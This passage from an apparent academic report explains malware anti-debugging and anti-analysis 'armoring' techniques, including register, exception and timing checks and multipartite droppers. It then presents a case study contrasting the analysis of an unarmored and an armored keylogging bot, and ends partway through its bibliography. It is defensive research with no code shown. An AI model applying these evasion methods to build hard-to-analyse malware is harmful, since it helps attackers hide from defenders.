4.6.2. Process and Thread Block Detection
As described above, relying on the higher level API to return the status of isDebuggerPresent is prone to
bypass due to direct editing of the malware. However, by moving lower in the application stack and
50
bypassing the API call in order to directly query the process and thread information to indicate the
existence of a debugger is more difficult to bypass. A similar implementation of the function above (in
Figure 23) is shown below (in Figure 24), but bypasses the API and instead queries the Process
Environment Block directly.
Figure 24 - Query PEB directly (Veracode, 2008)
In much the same way as the API call, direct editing of the malware to remove or invalidate the call to
check the value of will remove the debugger restriction. However, if this routine is placed inside
the packed or crypted body of the malware, the malware will need to be unpacked/decrypted into
memory first and then dumped to a file for editing. The catch here is that the dumping of a process to a
file is typically undertaken with a debugger.
4.6.3. Hardware and Register Based Detection
In keeping with the idea of moving closer to hardware in order to reduce the opportunity to bypass the
detection routine, having the malware directly access the CPU registers themselves to query the
isDebuggerPresent status is the next class of debugger detection. There are several Registers that can
be queried, including the
1) Flags Register, or the
2) Stack Segment Register, or the
3) Debug Registers.
If the program is being debugged, the TRAP flag will be set in the Flags register. Querying the Flags
register and exiting the malware if TRAP is set can be an effective anti-debugging technique. (Falliere,
2007)
51
The Stack Segment register can also be used to identify if a debugger is running. If the following
sequence of commands is run (Figure 25), the CPU will execute the , and then the next
instruction will be executed, but won’t break on it, thus stopping on the function. The
following instructions will then identify if a debugger is connected. By implementing this sequence of
instructions the investigators will have no opportunity to re-set the flag before the malware can
determine the isDebuggerPresent status (Falliere, 2007).
Figure 25 - Using Stack Segment to protect TRAP Flag (Falliere, 2007)
Finally, many debuggers use the Debug Registers (DR0 – DR7) to hold hardware breakpoints. Malware
could either check for the insertion of valid addresses into the registers (shown in Figure 26), or simply
clear out the contents of the register as a method of blocking the debugger (Falliere, 2007).
Figure 26 - Checking for use of Debug Registers (Veracode, 2008)
In each of these instances of debugger detection, recognition of the tactic, knowledge of assembly
language programming, access to an unpacked/decrypted executable and a hex editor can be used to
bypass the technique.
52
4.6.4. Exception Based Detection
An exception is an event that occurs during the execution of a program, and requires the execution of
code outside the normal flow of control. There are two kinds of exceptions: hardware exceptions and
software exceptions. The CPU initiates hardware exceptions. Software exceptions are initiated explicitly
by applications or the operating system. For example, the system can detect when an invalid parameter
value is specified. Structured exception handling is a mechanism for handling both hardware and
software exceptions. (Microsoft , 2010). Vectored exception handlers are an extension to structured
exception handling. An application can register a function to watch or handle all exceptions for the
application. Vectored handlers are not frame-based; therefore, you can add a handler that will be called
regardless of where you are in a call frame. Vectored handlers are called in the order that they were
added, after the debugger gets a first chance notification, but before the system begins unwinding the
stack (Microsoft, 2010).
As shown in Figure 27, the Vectored Exception
Handlers, the Structured Exception Handlers,
and the UnHandledExceptionFilter are chained
together to handle all exceptions. The trailing
UnHandledExceptionFilter at the end of the
chain is there to catch all previously unhandled
exceptions.
The UnhandledExceptionFilter() API determines
whether the process is being debugged. If it is,
then UnhandledExceptionFilter passes the
exception first to the debugger, and then is
supposed to call the process's unhandled
exception filter. If the process isn't being debugged, then UnhandledExceptionFilter calls the process's
unhandled exception filter. Depending on the filter function's return, UnhandledExceptionFilter either
continues execution at the point of the exception, or displays a system-modal dialog box informing the
user that the application is to be terminated due to an unhandled exception (Microsoft, 2006). Due to
this implementation of the UnhandledExceptionFilter, a debugger can be detected with the code snippet
shown in Figure 28.
Figure 27 - Chaining of Handlers (Jackson, 2008) (Bania)
53
Figure 28 - Use of Exception Handling to identify debugger (Veracode, 2008)
As with previous Debugger Detection techniques, the IsDebuggerPresent routine can be bypassed if the
technique is recognized. Even though these techniques can be bypassed, combing through the assembly
language code for each of these techniques can be quite onerous and may cause abandonment of the
binary analysis (Jackson, 2008).
4.6.5. Timing Based Detection
There is no doubt that when a program is being debugged, the time delta between instructions is longer
than if the CPU is freely running the executable. Based on this simple tenet, the developer of the
malware can insert sequences of instructions that calculate the time delta between the beginning and
ending of the sequence. Assuming there are no conditional jumps, or overwhelming load on the system,
the time delta can be measured in milliseconds or less. By comparison, even the most skilled reverse
engineer will take a few seconds to step through a series of instructions, especially if the function of the
instructions is not immediately obvious. This check could be coded using the snippet shown in Figure
29.
This routine, unlike some of the other debugger detection routines is relatively straight forward is
obvious to spot. Thus, an examiner will have no difficulty in bypassing the detection routine.
54
Figure 29 - – Use of Timing sequence to identify debugger (Veracode, 2008) (Bania)
4.6.6. Modified Code Based Detection
This debugger detection mechanism is more difficult to code. The theory behind the technique is that
the developer of the executable should be able to define a fingerprint of itself while in memory and then
carry this fingerprint within the executable (Veracode, 2008). Then, upon each execution of the binary,
the in-memory process fingerprint is compared to the fingerprint stored within the executable.
Given that each of the other debugger detection techniques requires the modification of either the
process in memory or executable image on disk, if any other protection mechanisms are bypassed the
in-memory fingerprint should be different than the fingerprint stored within the executable. Any
differences between the two fingerprints could result in the immediate termination of the executable.
If the routines that define the in-memory fingerprint can be identified, than the same technique of run-
time patching the executable should be able to bypass this protection mechanism.
4.7. Multi-partite
Multi-partite traditionally refers to a malware threat (virus, Trojan horse) that has components of both a
boot sector virus and a user or kernel mode rootkit (US Army, 2010). This traditional view has been
updated to include the Downloader/Dropper family of threats (Microsoft, 2010). These Downloader/
Droppers usually save a range of files to the victim’s drive (usually to the Windows directory, the
Windows system directory, temporary directory etc.), and launches them without any notification (or
with fake notification of an archive error, an outdated operating system version, etc.) (Kaspersky Lab
ZAO, 2009)
The goal of the multi-partite armoring technique is to minimize the footprint of each section of the
malware such that it is harder to detect, and easier to upgrade/expand to new threat capabilities. To
begin, multi-partite functionality must have implemented network transfer mechanisms and process
55
control mechanism that allow for new functionality to be downloaded and for processes to be restarted,
system settings updated, and dynamically linked libraries to be unloaded and reloaded. Dynamically
linked libraries (DLLs) are modules that contain functions and data that can be used by another module
(application or DLL). When the functions in a DLL change, the applications that use them do not need to
be re-compiled or re-linked as long as the function arguments, calling conventions, and return values do
not change. In contrast, statically linked object code requires that the application be re-linked when the
functions change. (Microsoft, 2010)
Hackers and other malicious actors use this armoring technique to allow for updates in anti-forensic
routines, IDS evasion tactics, and maintaining a level of control over their intellectual property. This level
of control allows the malware author to update and improve his malware without losing control over
the infected machine. As well, by spreading the functionality into multiple files on a victim computer, it
is more likely that a cleaning event will leave some portion of the malware untouched, allowing for
recontamination of the computer system.
An instance of malware that utilizes multipartite armoring techniques can defeat the traditional analysis
cycle by keeping both functions of the malware and files related to the malware hidden from the
forensic examiner. A method that the multipartite malware author can use is on-demand downloading
or installation of functions that make up the malware. Similarly, the technique of splitting capabilities
across multiple files make it more difficult for the forensic examiner to clean the system – increasing the
possibility that a portion of the malicious code will be left on the system after the incident is considered
closed.
Forensic examiners can update their procedures and tools to account for these multipartite armoring
techniques by:
1) File analysis of all files on the system using a hashing or signature based system (not just those
identified as the files that spawned the identified malware process)
2) Registry analysis – examination of all entries in all of the “auto-starts” locations, up to and
including all scheduled batch jobs.
3) Exhaustive analysis of running system – to identify all backgrounded processes that may be part
of the running threat.
56
These listed procedures offer no special visibility into systems infected with malware. It is exactly for
this reason that binary armoring techniques are so coveted by malware authors and researched by
information security researchers and analysts.
4.8. Conclusions
Modern malware authors are familiar and fluent in the binary analysis capabilities used by the
information Security defenders. In this way, the authors systematically focus on every step of the
analysis process and devise methods designed to inhibit the successful completion of that analysis step.
For the malware authors, the benefit of hiding these malicious executables translates into additional
information stolen, additional system access, and additional revenue (e.g.: number of spam messages
sent from bot-controlled systems). It is due to these benefits that the malware authors can continue to
spend so much time and energy devising these additional armoring techniques. This constant escalation
of attacker effectiveness also keeps the Information Security defenders engaged in the development of
sophisticated analysis tools that can return good results while not being rendered ineffective by the
malware itself.
5. Case Study
5.1. Introduction
Having gone through the steps that make up the typical binary analysis of a piece of malware, and
having gone through many of the techniques in use to armor an executable against reverse engineering
or analysis, a case study that aims to compare a simple, feature rich root kit that has both been armored
and not armored at all will be presented. The expected outcome of this case study is to demonstrate
how effective the armoring techniques are against the analysis process.
The preparation and identification sections will be common for both the basic rootkit and the armored
rootkit. The containment section will be separated into 2 sub-sections, one each for the basic rootkit
and the armored rootkit. The eradication and recovery sections will compare the outcomes based on
the data collected in each of the containment scenarios. Conclusions and lessons learned will be derived
from these findings.
57
5.2. Preparation
For this case study there is no additional preparation beyond the collection and organization of the
prerequisite tools described in Section 3.1 and proceduralized in Section 3.4. As much as possible, the
steps will be undertaken in exactly the same format and fashion as the described in those sections.
5.3. Identification
Identification of malicious executables continues to be a challenging opportunity for Information
Security (InfoSec) professionals. Authors of malware are aware of the tools and techniques the InfoSec
professionals use to identify these threats. Accordingly, the malware authors implement features
designed to evade as many of these controls as possible. Some of these features include:
1) Using protocols typically found in all corporate environments (HTTP, HTTPS)
2) Maintaining RFC compliance
3) Communicate with multiple C&C servers
By using protocols found in every corporate environment, monitoring system alerts aren’t raised when
malicious traffic is transacted across the network. This malicious traffic blends in, largely undetected,
with the vast amount of legitimate Internet traffic. As more business systems adopt web based user
interfaces, this challenge will continue to grow.
By maintaining RFC compliance, this malicious traffic becomes even more difficult to detect. Most
network IDS systems have multiple rules built around detecting web traffic that does not adhere to the
RFC standard. The alerts that are raised as a result of non-RFC compliant traffic are often inadvertently
identifying a C&C server involved in a malware infection.
Finally, by seamlessly communicating with multiple C&C servers, the malicious endpoint can confound
the detection ability of many varieties of traffic anomaly monitoring gear. Not only does communicating
with multiple C&C servers increase the difficulty of detection for the defender, but it increases the
reliability of the entire malware ecosystem.
For this case study, it is assumed that one of the pre-existing monitoring systems have identified this
host as being infected with some type of malicious binary.
5.4. Containment
The first scenario is built upon the identification of a piece of malware that is going to show itself to be
58
poorly armored, and as
such, quite incapable of
remaining active for
extended periods of time.
Upon arrival at the infected
host, an immediate
examination of the running
tasks and the location of
the file are completed. In
this case (shown in Figure
30), the file named
is identified
as the malware. After the
suspected file has been identified, and in keeping with the analysis process shown in Figure 7, the binary
is extracted from the infected system in order to be examined on a virtualized system outfitted with a
number of monitoring
systems. The first
examination of the file is in
the form of running a
system delta tool against it.
The results of the delta test
are included as Appendix B.
Data identified as a result of
the system delta tool
execution includes the
Registry key that is
modified, and the location
on disk where the malware
is installed. As well, the results show that none of the Windows system files have been modified.
The next tool to be run is SysAnalyzer (shown in Figure 32). SysAnalyzer returns an important finding:
namely exploits that match the signatures within the tool. This additional fact offers insight into the
Figure 30 - Identification of offending file
Figure 31 - Using a system delta tool
59
malware’s ability to spread throughout a network. The full output of SysAnalyzer can be found in
Appendix B, but the identified information regarding the exploits is shown in Figure 33.
Figure 32 - Using SysAnalyzer to analyze the malware
Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
*** Found: RPC DCOM Exploit MS03-026
*** Found: Microsoft Workstation Vulnurability
*** Found: LSASS exploit - MS04-011
Scan Complete: 240Kb in 0.016 seconds
Figure 33 – Exploit findings from Sysanalyzer
From here, the malware is opened from within PEid. The results of PEid show that the file has not been
packed, and was likely (not for certain) compiled with Microsoft Visual C v6.0 (based on the linker
information embedded in the binary). As well, as shown in Figure 34, there are a number of ASCII
strings that offer information about the goals of the malware. The list of strings found in this specimen
of malware has given the analyst a wealth of leads to follow in the investigation, including:
1) IP addresses of likely C&C servers (172.16.5.180)
2) Sections of seemingly valid URIs (get /cgi-bin/a?a=)
3) Registry locations (SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon)
4) System file names (C:\Windows\system32\userinit.exe)
60
5) Potential C&C commands (join, idle, SLEEPING, VERSION)
6) An identifier of the threat (armorbot)
Figure 34 - View of strings within the malware
Another aspect of the behavioural analysis of the malware involves the networking capabilities of the
malware. The data uncovered thus far has given a good picture of the capabilities of this malware:
updates the Registry; it has a number of commands, passed via a C&C server, seemingly located at
172.16.5.180, it communicates using TCP port 80; and has the ability to spread via automated exploits to
other systems on the network. While the other tools were running, a capture of the network
communication was being done of the traffic between the infected system and its peer located at
172.16.5.180. As shown in the extraction of the human readable portion of the network traffic (Figure
35), the malware appears to have key logger capabilities, and auto-update capabilities. With this
information, combined with firewall perimeter logs, an estimation of the duration of the infection and
the extent of the loss of intellectual property can be investigated.
61
Figure 35 – Human readable output from network packet capture
As a final stage in the analysis of this malware specimen, the file is disassembled down to machine
language. At this time, given the wealth of data collected using other means, the presentation of the
malware via IDA-pro (shown in Figure 36) is merely for verification of the findings.
From this point, using perimeter egress logs, it should be possible to accurately identify all of the
infected systems. Each of the infected systems can be contained, the key log files can be assessed for
potential damage via ex-filtration, and then the threat can be eradicated from the system. As well,
perimeter controls can be added to block all access to the known C&C control servers. At this point the
analysis can be considered complete.
62
Figure 36 – View of disassembled code and execution tree
At this time, the case study will attempt to extract the same level of data from the other malicious file,
except that in this instance the file has been armored. Where appropriate, I/O routines have been
replaced with armored versions of the routine. Additionally, the malware has been packed and crypted
using commonly available tools.
Selecting the atypical processes from the task list did the identification of the malware process running
on the infected machine. The file that spawned the malicious process was then identified and the file
was taken to the same virtualized analysis environment as used for the previous malware analysis.
The armored malware was run through the same installation process as before, but neither Inctrl5 nor
SysAnalyzer was able to provide meaningful context or explanation to what the capabilities of the new
malware are. The complete output of both of these tools is available in Appendix B.
With the failure of these initial behavioural analysis steps to provide any meaningful data, the analysis
moved into the binary and coding analysis phase. An attempt was made to open the file in a debugger,
but the debugger complained of file errors (Figure 37).
63
Figure 37 – Error message resulting from load into debugger
The file appeared to load successfully once the error messages were acknowledged, but the process
terminated immediately (Figure 38).
The After additional unsuccessful attempts
to spawn the malware in the virtualized
environment, from within analysis tools
like Inctrl5 or SysAnalyzer and from the
debugger, it was concluded that there were protections in place to stop the malware from running in
both a virtualized environment and via a debugger.
Once the platform and monitoring
software was installed on a clean machine,
the malware was executed on the system.
The output of SysAnalyzer is attached in
Appendix B, but none of the expected
information was produced. Similarly, there
were no recognizable strings in the file
dump. Recognizing that most packers and
crypters will make all ASCII strings appear
garbled in the file view, the in-memory
process was queried for useable strings. As
shown in Figure 39, there weren’t even decoded strings in the in-memory process.
At this point, an assessment of the network traffic was initiated. As shown in Figure 40, the network
traffic reveals little more than a single address, 172.16.5.180, using what appears to be encoded HTML
for communication with the C&C server. Based on these findings, monitoring routines can be defined to
notify on computers connecting to this IP address over port TCP80, but given the lack of other
Figure 38 - Process terminated once in debugger
Figure 39 – View of strings within the in-memory process
64
supporting evidence, it can’t be determined whether this is the only network destination and/or
protocol/port combination in use by the malware.
Figure 40 – Overlaid view of malware traffic (ASCII printable and TCP stream reassembled)
A media analysis uncovered what appears to be a key logger file. In much the same way as the
intercepted network communication, it appears as if there is key logging going on, it is just not possible
to verify the finding. Further, it is not possible to determine how much, or what type of information has
been logged. In fact, the only clue that the file is indeed a key log file is the file name. This file could
Figure 41 – View of keylogger.dat contents
65
actually be holding any compromised information. Further, as investigators, we have no idea how long
this collection has been going on, or how many times this file has been uploaded to the C&C server. The
content of the “keylogger.dat” file is shown in Figure 41.
Based on the results indicated by PEid, this armored malware is crypted or packed using some unknown
or unrecognized algorithm. By loading the malware into a debugger and stepping through the initial
unpacking/decrypting routines, the analyst should be able to identify the Original Entry Point (OEP) of
the malware. This OEP is important as it sets up all the relative addresses in the remainder of the PE file.
However, due to the armoring techniques implemented within the crypter, the OEP returned by the
debugger plug-ins are not valid (Figure 42). With an invalid OEP, the Import Address Table cannot be
successfully restored (Figure 43).
Figure 42 - Finding OEP using Ollydump
Figure 43 - Reconstructing an IAT without OEP
66
As a last step of automated analysis before being forced into a line-by-line disassembly and re-
constitution of the malware, a memory dump was collected from the system infected with the malware
using Nigilant32. Volatility v1.3beta was used in an attempt to pull process information from the
memory dump. The full script capture from the Volatility run is captured in Appendix B. Unfortunately,
the malware process was not susceptible to analysis using the Volatility framework.
At this time, the only known data collected from this malware specimen is the IP address 172.16.5.180
and the URI prefix of “/cgi-bin/a?a=”. This information can be used to create custom monitoring
routines for the identification of infected machines. Any further information required about the
malware will only be identified after line by line disassembly of the malware executable. This line by line
disassembly is beyond the skill of most analysts and will typically result in the abandonment of further
analysis.
5.5. Eradication
In the case of the not armored malware, the eradication plan could simply be to identify all machines
within the corporate network that try to connect to the C&C server address. Once identified, a manual
cleaning procedure could be undertaken, followed by a patching of every vulnerable system. Specific
monitoring routines could be created, based on the strings and IP addresses identified through the
analysis. In this way, any evidence of a re-infection will be immediately identified and a quick response
can be undertaken.
In the case of the armored malware, it isn’t clear that every capability within the malware has been
identified. It may be the case that functionality lies dormant for some amount of time waiting on some
future event or date to become active. It would be prudent to build monitoring routines that alert on
network traffic to sources that were identified through the analysis. Once those machines are
identified, it may be appropriate to re-install the system from original install media. This may be the
only way to completely assure the organization that the machine is free from the infection.
5.6. Recovery
In the case of the not armored malware, recovery is quite straight forward as the capabilities of the
malware are known, and the information exfiltrated via the key logger can be assessed. In this case, a
simple cleaning routine is all that is needed to recover the system back to its pre-infection state.
67
Recovery for the armored malware will be more involved than that required by the not armored
malware. As suggested in the recovery section, a complete re-install from original media is the best
option for eradicating the malware. However, in the recovery stage, all data will need to be recovered
from backups. A close look will need to be performed on each recovered file, as it is not known whether
the malware had the capability to attach itself to data files for future re-infection. Only files that can be
assessed and considered clean with good confidence should be returned to the production
environment.
5.7. Lessons Learned
Some lessons learned in both the armored and not armored malware case are:
1) Ingress points exist in the network that allowed malicious content into the trusted environment
2) Detection routines have gaps, as alerts were not raised when the threat was first realized
3) Malicious threats leverage protocols, in RFC compliant methods, so detection routines based
solely on improperly formatted protocols is ineffective
4) Ridding a system of a malware threat relies on manual intervention; in a large network manual
intervention is impractical.
Each of these lessons should be properly assessed; the risk to the organization qualified and mitigation
strategies should be fleshed out. Once this material is created, the plans should be prioritized by the
organization and an implementation plan should be created. Metrics can be used to track the
effectiveness of the implemented measures against future occurrences of infection.
5.8. Conclusions
As demonstrate through this case study, tools and procedures make quick work of analyzing a malware
specimen that has not been armored. The analysis extracted the network destinations, the commands,
and the methods for spread, data collection, and data transmission. The findings returned from the
analysis allow for specific monitoring routines to be created and procedures developed to clean infected
systems. In the other case, the best information collected from the analysis of the armored binary is a
single IP address believed to be the C&C server. Even though the analysis lasted far longer, and used
tools requiring more specialist knowledge, the analysis was unable to uncover the capabilities of the
malware.
68
6. Conclusions
The primary reason an organization will undertake a binary analysis of malware is to understand the
breadth of the attack and the impact of the attack. In the case of a malware infection, the breadth of
the attack or infection may simply be number of machines infected. This count of infected machines
could be identified through a number of systems – vendor supplied signatures in IDS, Firewall endpoint
logs, and/or A/V cleaning logs from signatures developed by A/V partner.
The impact of the attack will be decided based on the amount of damage done by the infected machine
(under the control of the attacker) or by the amount and type of data stolen through the infection. In
order to understand either the damage potential of the malware or the amount of damage done by the
malware requires analysis to be completed. This analysis will be a combination of network and host
based activities that can begin once a threat is known and identified.
Malware authors recognize that a key defense against being identified is the ability to remain hidden in
both the network and the hosts connected to it. In this way, one of the goals of binary armoring is to
ensure that the defenders of the network are unable to differentiate between normal traffic and traffic
that exists as a result of an ongoing infection by malware. Additionally, the other primary goal of the
armoring techniques described in this report is to block the understanding and mechanics of the
capabilities of the armored executable.
The armoring techniques described in this report are quite effective. The combination of network
encryption over RFC compliant protocols, debugger and VME detection, executable packing or crypting,
and poly- or meta- morphic transformation will often leave the malware investigator will little idea of
the true nature of the threat. As well, a significant amount of the analysis work is currently undertaken
using dynamic analysis tools connected to systems in a virtualized environment. Unfortunately, there
are two main issues that limit the completeness of the results delivered by a dynamic analysis tool are
(a) limited test cover- age and (b) malware programs that detect and evade the analysis environment
(Balzarotti, Cova, Karlberger, Kruegel, Kirda, & Vigna, 2010).
These techniques were demonstrated in the case study, and the resulting amount and quality of
information collected by the analysis of an armored binary was quite poor. These poor results also took
a considerable amount of time, effort, and tools to collect. As a result, given the significant investment
and insignificant return, it can be concluded that the effort expended in binary analysis should have
69
better been spent in other areas of response, namely the fortification of existing controls, or the timely
and broad publication of threat specific eradication routines.
Concentrating on response areas other than binary analysis is consistent with the proposed “Gateway
malware theory” ([email protected], 2009) which states that “simple malware infections, if not dealt
with quickly, will inevitably lead to the download and installation of poorly detected malware that poses
a real and true risk to organizations. The focus of any investigation of malware should be less focused on
the malware and more focused on the data that is contained on, or accessible from the infected system.
Therefore the first step in the investigation of malware should be data centric. If the contents of a
system are unknown, then the risk, regardless of the presence of malware, cannot be known or
determined. As such, the presence of malware is irrelevant unless the contents of the system are
known, and one must know what level of access the infected system, or user of the system has to
sensitive data.” ([email protected], 2009)
As organizations continue to rely more and more on the computing infrastructure and the
interconnectedness of their business, and while the proceeds of a successful intrusion continue to soar,
malware will continue to flourish. This malware is created at an alarming rate, it is armored using
sophisticated techniques, it attacks organizations from every conceivable vector, and is difficult to
properly analyze. Until such a time that a technology is created that will accurately identify and block
malware, commercial organizations should allocate their resources to building better detection
mechanisms and faster response and eradication plans.
70
7. Bibliography
Agile Risk Management LLC. (2011). Nigilant32. Retrieved 01 30, 2010, from
http://www.agileriskmanagement.com: http://www.agileriskmanagement.com/publications_4.html
Al Daoud, E., Jebril, I. H., & Zaqaibeh, B. (2008, 09). Computer Virus Strategies and Detection. Retrieved
01 11, 2011, from http://www.emis.de:
http://www.emis.de/journals/IJOPCM/files/IJOPCM(vol.1.2.3.S.08).pdf
Aquilina, J., Casey, E., & Malin, C. (2008). Malware Forensics: Investigating and Analyzing Malicious
Code. Burlington, MA: Syngress Publishing Inc.
Balzarotti, D., Cova, M., Karlberger, C., Kruegel, C., Kirda, E., & Vigna, G. (2010). Efficient Detection of
Split Personalities in Malware. Vienna: Austrian Science Department.
Bania, P. (n.d.). Playing with RDTSC. Retrieved 01 03, 2011, from http://www.piotrbania.com:
http://www.piotrbania.com/all/articles/playing_with_rdtsc.txt
Blunden, R. B. (2009). The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System. Plano,
Texas, USA: Wordware Publishing.
Bradley, K., & Harms, K. (2008, October 13). Mandiant.TacticalPanel.pdf. Retrieved October 1, 2010,
from http://files.sans.org: http://files.sans.org/summit/forensics08/PDFs/Mandiant.TacticalPanel.pdf
Cace Technologies. (2006, 12 01). WinDump: tcpdump for Windows. Retrieved 01 30, 2011, from
http://www.mirrorservice.org:
http://www.mirrorservice.org/sites/ftp.wiretapped.net/pub/security/packet-
capture/winpcap/windump/
Carvey, H. (2007). Windows Forensic Analysis. Burlington, MA, USA: Syngress.
Chen, X., Andersen, J., Mao, Z. M., Bailey, M., & Nazario, J. (2008, 09 22). Towards an Understanding of
Anti-virtualization and Anti-debugging Behavior in Modern Malware. Retrieved 01 11, 2011, from
http://www.eecs.umich.edu: http://www.eecs.umich.edu/~zmao/Papers/DCCS-xu-chen.pdf
Christodorescu, M., & Jha, S. (2003, 02). Static Analysis of Executables to Detect Malicious Patterns.
Retrieved 01 12, 2011, from http://www.cs.wisc.edu:
http://www.cs.wisc.edu/wisa/papers/security03/cj03.pdf
Christodorescu, M., Jha, S., Seshia, S. A., Song, D., & Bryant, R. E. (2005, 05 11). Semantics-aware
Malware Detection. Retrieved 01 11, 2011, from http://www.cs.berkeley.edu:
http://www.cs.berkeley.edu/~dawnsong/papers/semantic-aware.pdf
Davis, M. A., Bodmer, S. M., & LeMasters, A. (2010). Hacking Exposed: Malware and Rootkits. New York,
NY, USA: McGraw Hill.
71
Diamond Computer Systems Pty. (2005, 09 05). DiamondCS OpenPorts 1.0. Retrieved 01 15, 2011, from
http://www.softpedia.com: http://www.softpedia.com/get/Network-Tools/Network-
Information/DiamondCS-OpenPorts.shtml
Dinaburg, A., Royal, P. S., & Lee, W. (2009, April 1). Ether: Malware Analysis via Hardware Virtualization
Extensions. Retrieved 01 10, 2011, from http://www.maht0x0r.net:
http://www.maht0x0r.net/library/computing/Malware_Analysis_via_Hardware_Virtualization_Extensio
ns_-_ether_ccs_2008.pdf
Driller, T. M. (2002, Feb). Metamorphism in practice or "How I made MetaPHOR and what I've learnt".
Retrieved 12 17, 2010, from http://vx.netlux.org/lib/vmd01.html.
Eilam, E. (2005). Reversing: Secrets of Reverse Engineering. Indianapolis, IN: Wiley Publishing, Inc.
Erbschloe, M. (2005). Trojans, Worms, and Spyware. Amsterdam, Holland: Elsevier.
Falliere, N. (2007, 9 11). Windows Anti-Debug Reference. Retrieved 01 03, 2011, from Symantec
Corporation: http://www.symantec.com/connect/articles/windows-anti-debug-reference
Ferrie, P. (2007, 01 24). Attacks on Virtual Machine Emulators. Retrieved 01 10, 2011, from
http://www.symantec.com:
http://www.symantec.com/avcenter/reference/Virtual_Machine_Threats.pdf
Gigapede. (2011, 01 30). OllyDbg Plugins: OllyDump. Retrieved 01 30, 2011, from
http://www.openrce.org: http://www.openrce.org/downloads/details/108/OllyDump
HeavenTools Software. (2011). PE.Explorer. Retrieved 01 30, 2011, from http://www.heaventools.com:
http://www.heaventools.com/overview.htm
Hex-Rays SA . (2011). The IDA Pro Disassembler and Debugger. Retrieved 01 30, 2011, from
http://www.hex-rays.com: http://www.hex-rays.com/idapro/
[email protected]. (2010, 03 25). GUnPacker. Retrieved 01 30, 2011, from
http://www.woodmann.com: http://www.woodmann.com/collaborative/tools/index.php/GUnPacker
[email protected]. (2009, March 22). Gateway Malware Theory. Retrieved Sept 02, 2010, from Forensic
Incident Response: http://forensicir.blogspot.com/2009/03/gateway-malware-theory.html
Hoglund, G., & Butler, J. (2006). Rootkits: Subverting the Windows Kernel. Upper Saddle River, NJ, USA:
Addison Wesley.
Hoglund, G., & McGraw, G. (2004). Exploiting Software: How to Break Code. Boston, MA, USA: Addison-
Wesley.
Hosmer, C. (2008). Polymorphic & Metamorphic Malware. Las Vegas, NV: Black Hat Briefings and
Training.
72
iDefense Labs. (2011). MALCODE ANALYSIS SOFTWARE TOOLS . Retrieved 01 30, 2011, from
http://labs.idefense.com: http://labs.idefense.com/software/malcode.php
Intel. (1999). Intel Architecture Software Developer’s Manual. Volume 3: System Programming.
Retrieved 01 15, 2011, from http://download.intel.com:
http://download.intel.com/design/PentiumII/manuals/24319202.pdf
Jackson, J. (2008, 11 9). An Anti-Reverse Engineering Guide. Retrieved 01 03, 2011, from
http://www.codeproject.com: http://www.codeproject.com/KB/security/AntiReverseEngineering.aspx
Jibz, Qwerton, snaker, & xineohP. (2007). peid. Retrieved 12 15, 2010, from http://www.peid.info/:
http://www.peid.info/
Kaminsky, D. (2008). Reverse Engineering Code with IDA Pro. Burlington, MA, USA: Syngress.
Kang, M. G., Yin, H., Hanna, S., McCamant, S., & Song, D. (2009, 05 05). Emulating Emulation-Resistant
Malware. Retrieved 01 10, 2011, from http://bitblaze.cs.berkeley.edu:
http://bitblaze.cs.berkeley.edu/papers/VMSec02-kang.pdf
Kaspersky Lab ZAO. (2009, 03 18). Trojan-Dropper.Win32.Kido.a. Retrieved 01 15, 2011, from
http://www.securelist.com: http://www.securelist.com/en/descriptions/old21782844
Kaspersky, K. (2003). Hacker Disassembly Uncovered. Wayne, PA, USA: A-List, LLC.
Kendall, K. (2007, August 1). PRACTICAL MALWARE ANALYSIS. Retrieved Sept 30, 2010, from
http://www.blackhat.com: http://www.blackhat.com/presentations/bh-dc-
07/Kendall_McMillan/Paper/bh-dc-07-Kendall_McMillan-WP.pdf
Kim, H. C., Inoue, D., Eto, M., Takagi, Y., & Nakao, K. (2009, May 1). Toward Generic Unpacking
Techniques for Malware Analysis with Quantification of Code Revelation. Retrieved October 1, 2010,
from http://jwis2009.nsysu.edu.tw:
http://jwis2009.nsysu.edu.tw/location/paper/Toward%20Generic%20Unpacking%20Techniques%20for
%20Malware%20Analysis%20with%20Quantification%20of%20Code%20Revelation.pdf
Klein, T. (2010). Virtual Machine Monitors. Retrieved 01 10, 2011, from http://www.trapkit.de:
http://www.trapkit.de/research/vmm/index.html
Kleissner, P. (2008, July 1). polymorphic-encryption-methods. Retrieved October 1, 2010, from
http://web17.webbpro.de: http://web17.webbpro.de/index.php?page=polymorphic-encryption-
methods
Kleissner, P. (2009, 2 14). Windows Exception Handling. Retrieved 01 03, 2011, from
http://web17.webbpro.de: http://web17.webbpro.de/index.php?page=windows-exception-handling
73
Kruegel, C., Kirda, E., Mutz, D., Robertson, W., & Vigna, G. (2005, 09). Polymorphic Worm Detection
Using Structural Information of Executables. Retrieved 01 11, 2010, from http//www.cs.ucsb.edu:
http://www.cs.ucsb.edu/~chris/research/doc/raid05_polyworm.pdf
Lin, D. (2009). Hunting for Undetectable Metamorphic Viruses. Jan Jose, CA: San Jose State University.
Liston, T., & Skoudis, E. (2006). On the Cutting Edge:Thwarting Virtual Machine Detection . Retrieved 01
10, 2011, from http://handlers.sans.org:
http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf
MackT. (2008, 03 10). ImpREC. Retrieved 01 30, 2011, from http://www.woodmann.com:
http://www.woodmann.com/collaborative/tools/index.php/ImpREC
Mandia, K., Prosise, C., & Pepe, M. (2003). Incident Response & Computer Forensics, 2nd Edition.
Emeryville, California, USA: McGraw-Hill/ Osbourne.
Microsoft . (2010, 12 14). Structured Exception Handling. Retrieved 01 03, 2011, from
http://msdn.microsoft.com: http://msdn.microsoft.com/en-us/library/ms680657(v=vs.85).aspx
Microsoft. (2010, 12 15). Advantages of Dynamic Linking. Retrieved 01 15, 2011, from
http://msdn.microsoft.com: http://msdn.microsoft.com/en-us/library/ms681938(v=VS.85).aspx
Microsoft. (2006, 11 21). BUG: Unhandled exception filter not called inside debugger. Retrieved 01 03,
2011, from http://support.microsoft.com: http://support.microsoft.com/kb/173652/en-us
Microsoft. (2010). DDEspy: DDE Event and Status Viewer. Retrieved 01 30, 2011, from
http://msdn.microsoft.com: http://msdn.microsoft.com/en-us/library/aa242184(v=vs.60).aspx
Microsoft. (2010). Malware Protection Center: Glossary. Retrieved 01 03, 2011, from
http://www.microsoft.com:
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Glossary.aspx#trojan_downloader_dro
pper
Microsoft. (2006, 11 1). RootKitRevealer. Retrieved 12 30, 2010, from http://technet.microsoft.com:
